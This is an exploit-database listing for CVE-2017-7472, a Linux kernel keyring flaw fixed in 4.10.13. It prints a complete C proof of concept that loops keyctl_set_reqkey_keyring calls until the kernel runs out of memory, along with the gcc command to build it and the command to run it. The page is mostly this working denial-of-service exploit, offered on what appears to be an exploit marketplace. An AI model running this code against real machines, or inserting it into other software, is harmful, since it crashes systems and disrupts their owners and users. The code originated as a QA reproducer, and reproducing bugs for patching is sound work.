[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Linux Kernel < 4.10.13 - keyctl_set_reqkey_keyring Local Denial of Service Exploit

Author
Marcus Meissner
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-27913
Category
dos / poc
Date add
07-06-2017
CVE
CVE-2017-7472
Platform
linux
/*
Source: https://bugzilla.novell.com/show_bug.cgi?id=1034862
QA REPRODUCER:
 
gcc -O2 -o CVE-2017-7472 CVE-2017-7472.c -lkeyutils
./CVE-2017-7472
 
(will run the kernel out of memory)
*/
#include <sys/types.h>
#include <keyutils.h>
 
int main()
{
    for (;;)
        keyctl_set_reqkey_keyring(KEY_REQKEY_DEFL_THREAD_KEYRING);
}

#  0day.today [2024-12-25]  #